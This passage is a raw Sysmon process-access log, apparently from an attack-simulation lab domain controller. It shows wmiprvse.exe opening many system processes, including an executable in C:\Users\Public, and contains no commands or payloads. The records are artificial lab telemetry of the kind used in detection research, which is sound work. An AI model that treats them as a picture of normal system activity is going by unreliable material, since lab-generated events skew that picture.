15:16:05.143{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 